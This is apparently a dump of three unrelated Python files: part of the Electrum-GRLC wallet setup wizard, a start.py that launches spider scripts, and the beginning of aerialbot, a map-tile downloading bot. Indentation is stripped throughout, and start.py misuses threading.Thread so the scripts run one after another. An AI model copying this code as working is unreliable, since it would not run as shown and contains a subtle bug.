hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum-grlc.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
name_e = QLineEdit()
hbox.addWidget(name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
msg_label = WWLabel('')
vbox.addWidget(msg_label)
hbox2 = QHBoxLayout()
pw_e = PasswordLineEdit('', self)
pw_e.setFixedWidth(17 * char_width_in_lineedit())
pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(pw_label)
hbox2.addWidget(pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
vbox.addSpacing(50)
vbox_create_new = QVBoxLayout()
vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
button_create_new = QPushButton(_('Create New Wallet'))
button_create_new.setMinimumWidth(120)
vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
widget_create_new = QWidget()
widget_create_new.setLayout(vbox_create_new)
vbox_create_new.setContentsMargins(0, 0, 0, 0)
vbox.addWidget(widget_create_new)
self.set_layout(vbox, title=_('Electrum-GRLC wallet'))
temp_storage = None # type: Optional[WalletStorage]
wallet_folder = os.path.dirname(path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
name_e.setText(path)
def on_filename(filename):
# FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
nonlocal temp_storage
temp_storage = None
msg = None
if filename:
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
temp_storage = wallet_from_memory.storage # type: Optional[WalletStorage]
else:
temp_storage = WalletStorage(path)
except (StorageReadWriteError, WalletFileException) as e:
msg = _('Cannot read file') + f'\n{repr(e)}'
except Exception as e:
self.logger.exception('')
msg = _('Cannot read file') + f'\n{repr(e)}'
else:
msg = ""
self.next_button.setEnabled(temp_storage is not None)
user_needs_to_enter_password = False
if temp_storage:
if not temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
if msg is None:
msg = _('Cannot read file')
msg_label.setText(msg)
widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
if user_needs_to_enter_password:
pw_label.show()
pw_e.show()
pw_e.setFocus()
else:
pw_label.hide()
pw_e.hide()
button.clicked.connect(on_choose)
button_create_new.clicked.connect(
partial(
name_e.setText,
get_new_wallet_name(wallet_folder)))
name_e.textChanged.connect(on_filename)
name_e.setText(os.path.basename(path))
def run_user_interaction_loop():
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled()
assert temp_storage
if temp_storage.file_exists() and not temp_storage.is_encrypted():
break
if not temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if temp_storage.file_exists() and temp_storage.is_encrypted():
if temp_storage.is_encrypted_with_user_pw():
password = pw_e.text()
try:
temp_storage.decrypt(password)
break
except InvalidPassword as e:
self.show_message(title=_('Error'), msg=str(e))
continue
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
elif temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
except InvalidPassword as e:
self.show_message(title=_('Error'),
msg=_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except (UserCancelled, GoBack):
raise
except BaseException as e:
self.logger.exception('')
self.show_message(title=_('Error'), msg=repr(e))
raise UserCancelled()
if temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
try:
run_user_interaction_loop()
finally:
try:
pw_e.clear()
except RuntimeError: # wrapped C/C++ object has been deleted.
pass # happens when decrypting with hw device
return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
path = storage.path
if db.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = db.split_accounts(path)
msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = db.get_action()
if action and db.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = json.loads(storage.read())
self.run(action)
for k, v in self.data.items():
db.put(k, v)
db.write(storage)
return
if db.requires_upgrade():
self.upgrade_db(storage, db)
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
self.logger.error("on_error", exc_info=exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True, focused_widget=None):
self.set_layout(layout, title, next_enabled)
if focused_widget:
focused_widget.setFocus()
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled()
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi, config=self.config)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(
title=message,
is_seed=is_seed,
options=options,
parent=self,
config=self.config,
)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.seed_type, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
if self.opt_slip39:
options.append('slip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, seed_type, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(
seed=seed_text,
title=title,
msg=True,
options=['ext'],
config=self.config,
)
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
pw_layout = PasswordLayout(
msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
pw_layout.encrypt_cb.setChecked(True)
try:
self.exec_layout(pw_layout.layout(), focused_widget=pw_layout.new_pw)
return pw_layout.new_password(), pw_layout.encrypt_cb.isChecked()
finally:
pw_layout.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
if msg is None:
msg = _("Please wait...")
exc = None # type: Optional[Exception]
res = None
def task_wrapper():
nonlocal exc
nonlocal res
try:
res = task()
except Exception as e:
exc = e
self.waiting_dialog(task_wrapper, msg=msg)
if exc is None:
return res
else:
raise exc
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
self,
*,
title: str,
message1: str,
choices: List[Tuple[str, str, str]],
hide_choices: bool = False,
message2: str,
test_text: Callable[[str], int],
run_next,
default_choice_idx: int = 0,
get_account_xpub=None,
) -> Tuple[str, str]:
vbox = QVBoxLayout()
if get_account_xpub:
button = QPushButton(_("Detect Existing Accounts"))
def on_account_select(account):
script_type = account["script_type"]
if script_type == "p2pkh":
script_type = "standard"
button_index = c_values.index(script_type)
button = clayout.group.buttons()[button_index]
button.setChecked(True)
line.setText(account["derivation_path"])
button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
vbox.addWidget(button, alignment=Qt.AlignLeft)
vbox.addWidget(QLabel(_("Or")))
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
if not hide_choices:
vbox.addLayout(clayout.layout())
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(
xpub,
title=msg,
icon=False,
for_seed_words=False,
config=self.config,
)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network: 'Network'):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
self.config.set_key('auto_connect', network.auto_connect, True)
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
n_edit = QSlider(Qt.Horizontal, self)
m_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
backup_warning_label.setVisible(cw.m != cw.n)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
backup_warning_label.setVisible(cw.m != cw.n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
vbox.addSpacing(2 * char_width_in_lineedit())
backup_warning_label = WWLabel(_("Warning: to be able to restore a multisig wallet, "
"you should include the master public key for each cosigner "
"in all of your backups."))
vbox.addWidget(backup_warning_label)
on_n(2)
on_m(2)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
start.py
|
import os
import threading
threading.Thread(target=os.system("python spider_main2.py"))
threading.Thread(target=os.system("python spider_main3.py"))
threading.Thread(target=os.system("python spider_main4.py"))
threading.Thread(target=os.system("python spider_main5.py"))
threading.Thread(target=os.system("python spider_main6.py"))
|
aerialbot.py
|
import io
import math
import os
import re
import random
import sys
import time
from datetime import datetime
import argparse
import logging
import logging.config
import traceback
import concurrent.futures
import threading
import requests
from configobj import ConfigObj
import shapefile
import shapely.geometry
from PIL import Image, ImageEnhance, ImageOps
Image.MAX_IMAGE_PIXELS = None
import tweepy
TILE_SIZE = 256 # in pixels
EARTH_CIRCUMFERENCE = 40075.016686 * 1000 # in meters, at the equator
USER_AGENT = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36"
LOGGER = None
VERBOSITY = None
class WebMercator:
"""Various functions related to the Web Mercator projection."""
@staticmethod
def project(geopoint, zoom):
"""
An implementation of the Web Mercator projection (see
https://en.wikipedia.org/wiki/Web_Mercator_projection#Formulas) that
returns floats. That's required for cropping of stitched-together tiles
such that they only show the configured area, hence no use of math.floor
here.
"""
factor = (1 / (2 * math.pi)) * 2 ** zoom
x = factor * (math.radians(geopoint.lon) + math.pi)
y = factor * (math.pi - math.log(math.tan((math.pi / 4) + (math.radians(geopoint.lat) / 2))))
return (x, y)
class GeoPoint:
"""
A latitude-longitude coordinate pair, in that order due to ISO 6709, see:
https://stackoverflow.com/questions/7309121/preferred-order-of-writing-latitude-longitude-tuples
"""
def __init__(self, lat, lon):
assert -90 <= lat <= 90 and -180 <= lon <= 180
self.lat = lat
self.lon = lon
def __repr__(self):
return f"GeoPoint({self.lat}, {self.lon})"
def fancy(self):
"""Stringifies the point in a more fancy way than __repr__, e.g.
"44°35'27.6"N 100°21'53.1"W", i.e. with minutes and seconds."""
# helper function as both latitude and longitude are stringified
# basically the same way
def fancy_coord(coord, pos, neg):
coord_dir = pos if coord > 0 else neg
coord_tmp = abs(coord)
coord_deg = math.floor(coord_tmp)
coord_tmp = (coord_tmp - math.floor(coord_tmp)) * 60
coord_min = math.floor(coord_tmp)
coord_sec = round((coord_tmp - math.floor(coord_tmp)) * 600) / 10
coord = f"{coord_deg}°{coord_min}'{coord_sec}\"{coord_dir}"
return coord
lat = fancy_coord(self.lat, "N", "S")
lon = fancy_coord(self.lon, "E", "W")
return f"{lat} {lon}"
@classmethod
def random(cls, georect):
"""
Generating a random point with regard to actual surface area is a bit
tricky due to meridians being closer together at high latitudes (see
https://en.wikipedia.org/wiki/Mercator_projection#Distortion_of_sizes),
which is why this isn't just a matter of doing something like this:
lat = random.uniform(georect.sw.lat, georect.ne.lat)
lon = random.uniform(georect.sw.lon, georect.ne.lon)
"""
# latitude
north = math.radians(georect.ne.lat)
south = math.radians(georect.sw.lat)
lat = math.degrees(math.asin(random.random() * (math.sin(north) - math.sin(south)) + math.sin(south)))
# longitude
west = georect.sw.lon
east = georect.ne.lon
width = east - west
if width < 0:
width += 360
lon = west + width * random.random()
if lon > 180:
lon -= 360
elif lon < -180:
lon += 360
# for debugging:
"""
for i in range(1000):
p = GeoPoint.random(GeoRect(GeoPoint(0,0),GeoPoint(90,10)))
print(f"{p.lon} {p.lat}")
sys.exit()
# run as: python3 aerialbot.py | gnuplot -p -e "plot '<cat'"
"""
return cls(lat, lon)
def to_maptile(self, zoom):
"""
Conversion of this geopoint to a tile through application of the Web
Mercator projection and flooring to get integer tile corrdinates.
"""
x, y = WebMercator.project(self, zoom)
return MapTile(zoom, math.floor(x), math.floor(y))
def to_shapely_point(self):
"""
Conversion to a point as expected by shapely. Note that latitude and
longitude are reversed here – this matches their order in shapefiles.
"""
return shapely.geometry.Point(self.lon, self.lat)
def compute_zoom_level(self, max_meters_per_pixel):
"""
Computes the outermost (i.e. lowest) zoom level that still fulfills the
constraint. See:
https://wiki.openstreetmap.org/wiki/Slippy_map_tilenames#Resolution_and_Scale
"""
meters_per_pixel_at_zoom_0 = ((EARTH_CIRCUMFERENCE / TILE_SIZE) * math.cos(math.radians(self.lat)))
# 23 seems to be highest zoom level supported anywhere in the world, see
# https://stackoverflow.com/a/32407072 (although 19 or 20 is the highest
# in many places in practice)
for zoom in reversed(range(0, 23+1)):
meters_per_pixel = meters_per_pixel_at_zoom_0 / (2 ** zoom)
# once meters_per_pixel eclipses the maximum, we know that the
# previous zoom level was correct
if meters_per_pixel > max_meters_per_pixel:
return zoom + 1
else:
# if no match, the required zoom level would have been too high
raise RuntimeError("your settings seem to require a zoom level higher than is commonly available")
class GeoRect:
"""
A rectangle between two points. The first point must be the southwestern
corner, the second point the northeastern corner:
+---+ ne
| |
sw +---+
"""
def __init__(self, sw, ne):
assert sw.lat <= ne.lat
# not assert sw.lon < ne.lon since it may stretch across the date line
self.sw = sw
self.ne = ne
def __repr__(self):
return f"GeoRect({self.sw}, {self.ne})"
@classmethod
def from_shapefile_bbox(cls, bbox):
"""
Basically from [sw_lon, sw_lat, ne_lon, sw_lat], which is the order
pyshp stores bounding boxes in.
"""
sw = GeoPoint(bbox[1], bbox[0])
ne = GeoPoint(bbox[3], bbox[2])
return cls(sw, ne)
@classmethod
def around_geopoint(cls, geopoint, width, height):
"""
Creates a rectangle with the given point at its center. Like the random
point generator, this accounts for high-latitude longitudes being closer
together than at the equator. See also:
https://wiki.openstreetmap.org/wiki/Slippy_map_tilenames#Resolution_and_Scale
"""
assert width > 0 and height > 0
meters_per_degree = (EARTH_CIRCUMFERENCE / 360)
width_geo = width / (meters_per_degree * math.cos(math.radians(geopoint.lat)))
height_geo = height / meters_per_degree
southwest = GeoPoint(geopoint.lat - height_geo / 2, geopoint.lon - width_geo / 2)
northeast = GeoPoint(geopoint.lat + height_geo / 2, geopoint.lon + width_geo / 2)
return cls(southwest, northeast)
class GeoShape:
"""
This class is where shapefiles (of the form detailed in the config example,
i.e. containing one layer with one polygon shape with lon/lat coordinates)
are loaded and queried. Note that shapefiles use (lon, lat) coordinates,
which are sequestered to this class only.
"""
def __init__(self, shapefile_path):
sf = shapefile.Reader(shapefile_path)
shapes = sf.shapes()
assert len(shapes) == 1
assert shapes[0].shapeTypeName == 'POLYGON'
self.outline = shapes[0]
def contains(self, geopoint):
"""Does the shape contain the point?"""
point = geopoint.to_shapely_point()
polygon = shapely.geometry.shape(self.outline)
return polygon.contains(point)
def random_geopoint(self):
"""
A random geopoint, using rejection sampling to make sure it's
contained within the shape.
"""
bounds = GeoRect.from_shapefile_bbox(self.outline.bbox)
geopoint = GeoPoint.random(bounds)
i = 0
while not self.contains(geopoint):
i += 1
if i > 250:
raise ValueError("cannot seem to find a point in the shape's bounding box that's within the shape – is your data definitely okay (it may well be if it's a bunch of spread-out islands)? if you're sure, you'll need to raise the iteration limit in this function")
geopoint = GeoPoint.random(bounds)
return geopoint
class MapTileStatus:
"""An enum type used to keep track of the current status of map tiles."""
PENDING = 1
CACHED = 2
DOWNLOADING = 3
DOWNLOADED = 4
ERROR = 5
class MapTile:
"""
A map tile: coordinates and, if it's been downloaded yet, image, plus some
housekeeping stuff.
"""
# static class members set based on the configuration
tile_path_template = None
tile_url_template = None
def __init__(self, zoom, x, y):
self.zoom = zoom
self.x = x
self.y = y
# initialize the other variables
self.status = MapTileStatus.PENDING
self.image = None
self.filename = None
if (MapTile.tile_path_template):
self.filename = MapTile.tile_path_template.format(zoom=self.zoom, x=self.x, y=self.y)
def __repr__(self):
return f"MapTile({self.zoom}, {self.x}, {self.y})"
def zoomed(self, zoom_delta):
"""
Returns a MapTileGrid of the area covered by this map tile, but zoomed
by zoom_delta. This works this way because by increasing the zoom level
by 1, a tile's area is subdivided into 4 quadrants.
"""
zoom = self.zoom + zoom_delta
fac = (2 ** zoom_delta)
return MapTileGrid([[MapTile(zoom, self.x * fac + x, self.y * fac + y)
for y in range(0, fac)]
for x in range(0, fac)])
def load(self):
"""Loads the image either from cache or initiates a download."""
if self.filename is None:
self.download()
else:
# check if already downloaded in tile store, otherwise download
try:
self.image = Image.open(self.filename)
self.image.load()
self.status = MapTileStatus.CACHED
except IOError:
self.download()
def download(self):
"""
Downloads a tile image. Sets the status to ERROR if things don't work
out for whatever reason. Finally, writes the image to the cache if
enabled.
"""
self.status = MapTileStatus.DOWNLOADING
try:
url = MapTile.tile_url_template.format(x=self.x, y=self.y, zoom=self.zoom)
r = requests.get(url, headers={'User-Agent': USER_AGENT})
except requests.exceptions.ConnectionError:
self.status = MapTileStatus.ERROR
return
# error handling (note that a warning is appropriate here – if this tile
# is one of a tiles used in imagery quality testing, an error is not an
# unexpected outcome and should thus not be thrown)
if r.status_code != 200:
LOGGER.warning(f"Unable to download {self}, status code {r.status_code}.")
self.status = MapTileStatus.ERROR
return
# convert response into an image
data = r.content
self.image = Image.open(io.BytesIO(data))
# sanity check
assert self.image.mode == "RGB"
assert self.image.size == (TILE_SIZE, TILE_SIZE)
# save original data (not: re-encoded via image.save) in tile store if
# enabled (and create the directory first if it doesn't already exist)
if self.filename is not None:
d = os.path.dirname(self.filename)
if not os.path.isdir(d):
os.makedirs(d)
with open(self.filename, 'wb') as f:
f.write(data)
self.status = MapTileStatus.DOWNLOADED
class ProgressIndicator:
"""
Displays and updates a progress indicator during tile download. Designed
to run in a separate thread, polling for status updates frequently.
"""
def __init__(self, maptilegrid):
self.maptilegrid = maptilegrid
def update_tile(self, maptile):
"""
Updates a single tile depending on its state: pending tiles are grayish,
cached tiles are blue, downloading tiles are yellow, successfully
downloaded tiles are green, and tiles with errors are red. For each
tile, two characters are printed – in most fonts, this is closer to a
square than a single character. See https://stackoverflow.com/a/39452138
for color escapes.
"""
def p(s): print(s + "\033[0m", end='')
if maptile.status == MapTileStatus.PENDING:
p("░░")
elif maptile.status == MapTileStatus.CACHED:
p("\033[34m" + "██")
elif maptile.status == MapTileStatus.DOWNLOADING:
p("\033[33m" + "▒▒")
elif maptile.status == MapTileStatus.DOWNLOADED:
p("\033[32m" + "██")
elif maptile.status == MapTileStatus.ERROR:
p("\033[41m\033[37m" + "XX")
def update_text(self):
"""
Displays percentage and counts only.
"""
cached = 0
downloaded = 0
errors = 0
for maptile in self.maptilegrid.flat():
if maptile.status == MapTileStatus.CACHED:
cached += 1
elif maptile.status == MapTileStatus.DOWNLOADED:
downloaded += 1
elif maptile.status == MapTileStatus.ERROR:
errors += 1
done = cached + downloaded
total = self.maptilegrid.width * self.maptilegrid.height
percent = int(10 * (100 * done / total)) / 10
details = f"{done}/{total}"
if cached:
details += f", {cached} cached"
if downloaded:
details += f", {downloaded} downloaded"
if errors:
details += f", {errors} error"
if errors > 1:
details += "s"
# need a line break after it so that the first line of the next
# iteration of the progress indicator starts at col 0
print(f"{percent}% ({details})")
def update(self):
"""Updates the progress indicator."""
# if normal verbosity is selected, don't do anything fancy
if VERBOSITY == "normal":
self.update_text()
return
for y in range(self.maptilegrid.height):
for x in range(self.maptilegrid.width):
maptile = self.maptilegrid.at(x, y)
self.update_tile(maptile)
print() # line break
self.update_text()
# move cursor back up to the beginning of the progress indicator for
# the next iteration, see
# http://www.tldp.org/HOWTO/Bash-Prompt-HOWTO/x361.html
print(f"\033[{self.maptilegrid.height + 1}A", end='')
def loop(self):
"""Main loop."""
if VERBOSITY == "quiet":
return
while any([maptile.status is MapTileStatus.PENDING or
maptile.status is MapTileStatus.DOWNLOADING
for maptile in self.maptilegrid.flat()]):
self.update()
time.sleep(0.1)
self.update() # final update to show that we're all done
def cleanup(self):
"""Moves the cursor back to the bottom after completion."""
if VERBOSITY == "quiet" or VERBOSITY == "normal":
return
print(f"\033[{self.maptilegrid.height}B")
class MapTileGrid:
"""
A grid of map tiles, kepts as a nested list such that indexing works via
[x][y]. Manages the download and stitching of map tiles into a preliminary
result image.
"""
def __init__(self, maptiles):
self.maptiles = maptiles
self.width = len(maptiles)
self.height = len(maptiles[0])
self.image = None
def __repr__(self):
return f"MapTileGrid({self.maptiles})"
@classmethod
def from_georect(cls, georect, zoom):
"""Divides a GeoRect into a grid of map tiles."""
southwest = georect.sw.to_maptile(zoom)
northeast = georect.ne.to_maptile(zoom)
maptiles = []
for x in range(southwest.x, northeast.x + 1):
col = []
# it's correct to have northeast and southwest reversed here (with
# regard to the outer loop) since y axis of the tile coordinates
# points toward the south, while the latitude axis points due north
for y in range(northeast.y, southwest.y + 1):
maptile = MapTile(zoom, x, y)
col.append(maptile)
maptiles.append(col)
return cls(maptiles)
def at(self, x, y):
"""Accessor with wraparound for negative values: x/y<0 => x/y+=w/h."""
if x < 0:
x += self.width
if y < 0:
y += self.height
return self.maptiles[x][y]
def flat(self):
"""Returns the grid as a flattened list."""
return [maptile for col in self.maptiles for maptile in col]
def has_high_quality_imagery(self):
"""
Checks if the corners of the grid are available two levels more zoomed
in, which should make sure that we're getting high-quality imagery at
the original zoom level.
"""
zoom_delta = 2
# since the at() function wraps around, [self.at(x, y) for x and y in
# [0,-1]] selects the four corners of the grid, then for each of them a
# "subgrid" is generated using .zoomed(), and for each of them, the
# relevant corner is accessed through reuse of x and y
corners = [self.at(x, y).zoomed(zoom_delta).at(x, y) for x in [0, -1] for y in [0, -1]]
# check if they have all downloaded successfully
all_good = True
for c in corners:
c.load()
